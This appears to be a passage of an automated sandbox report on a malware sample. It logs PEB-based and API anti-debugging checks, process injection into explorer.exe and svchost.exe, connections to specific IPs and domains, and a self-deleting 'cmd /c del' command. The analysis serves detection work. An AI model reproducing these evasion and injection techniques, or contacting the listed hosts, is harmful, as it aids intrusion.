            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016D41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016F8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016735A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01702073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01711074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_017014FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016890AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0170131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016837F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01715BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01658794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0170138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0168927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016D4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01678E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01658A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01663A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016716E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016576E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016736CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01688EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7F9D5 SetUnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.221 80
Source: C:\Windows\explorer.exe | Network Connect: 5.101.152.161 80
Source: C:\Windows\explorer.exe | Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe | Domain query: www.sandstormcase.us
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 350000
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Thread register set: target process: 3452
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 3452
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe | Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000003.00000000.334292418.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304261536.0000000006770000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.324252359.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.260934888.0000000001378000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CProgmanile
